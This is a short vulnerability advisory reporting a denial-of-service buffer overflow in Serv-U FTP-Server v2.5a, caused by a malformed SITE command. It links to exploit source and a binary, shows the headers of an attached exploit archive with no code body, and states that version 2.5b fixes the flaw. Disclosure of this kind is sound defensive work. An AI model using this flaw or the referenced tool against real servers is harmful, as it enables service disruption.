COMMAND

    Serv-U FTP-Server

SYSTEMS AFFECTED

    Serv-U FTP-Server v2.5a

PROBLEM

    UssrLabs found a local/remote DoS attack in Serv-U FTP-Server
    v2.5a.  The buffer overflow is caused by a malformed SITE
    command.  For the source / binary of this remote / local DoS
    go to:

        http://www.ussrback.com/servu/

    Thanks to dark spyrit for letting UssrLabs know about this.
    MIME-encoded source follows:

    ---
    Content-Type: application/octet-stream; name="dieserv.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="dieserv.zip"
    Content-MD5: jcij2fH6yy3xse5VPu/ksg==

    -----

SOLUTION

    This has been fixed in 2.5b.